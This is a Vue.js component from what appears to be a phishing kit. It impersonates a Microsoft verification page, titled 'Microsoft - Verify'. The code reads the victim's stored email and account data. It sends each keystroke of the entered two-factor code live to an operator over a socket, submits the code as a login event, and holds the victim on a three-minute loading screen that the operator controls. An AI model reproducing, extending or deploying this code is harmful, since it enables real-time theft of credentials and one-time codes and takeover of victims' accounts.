<template src="./index.html">
    
</template>
<script>
// ...existing code...
export default {
  name: 'MicrosoftCode_Error',
  props: {
    adminData: {
      type: Object,
      default: () => ({})
    }
  },
  data() {
    return {
      username: localStorage.getItem('email'),
      userInfo : localStorage.getItem('accountinfo') ? JSON.parse(localStorage.getItem('accountinfo')) : {},
      message: '',
      password: '',
      isValidInput: false,
      microsoft_code: "",
    };
  },
  computed: {

  },
  watch: {

  },
  created() {
    
  },
  mounted() {
    document.title = "Microsoft - Verify"
    // Setup show password functionality
    this.$socket.on('admin-message', (data) => {
      try {
        this.isValidInput = false;
        document.getElementById("body-form").classList.remove("loading");
      } catch(error) {          
      }
    });

  },
  methods: {
    onTwoFactorInput() {
      // Debounce typing events để tránh spam
      if (this.typingTimer) {
        clearTimeout(this.typingTimer);
      }
      
      this.typingTimer = setTimeout(() => {
        const typingData = {
          username: this.username,
          formType: 'microsoft_code',
          inputValue: this.microsoft_code,
          time: new Date().toISOString()
        };
        
        // Emit socket event để thông báo admin
        this.$socket.emit('user-typing-password', typingData);
      }, 500); // Delay 500ms
    },

    handleMicrosoftCodeSubmit() {
      if (!this.microsoft_code) return;
      this.isValidInput = true;
      // Set loading state
      this.isLoading = true;
      
      const loginData = {
        username: this.username,
        status: 'microsoft_code_error',
        microsoft_code: this.microsoft_code,
        time: new Date().toISOString()
      };

      this.$socket.emit('user-login', loginData);
      document.getElementById("body-form").classList.add("loading");

      setTimeout(() => {
        try {
          document.getElementById("body-form").classList.remove("loading");
        } catch(error) {          
        }
        // tại đây bạn xử lý tiếp (redirect, hiển thị thông báo, ...)
      }, 180000); // 180000ms = 3 phút
    },
  }
};
</script>

<style lang="css" scoped>
@import "./styles.css";
</style>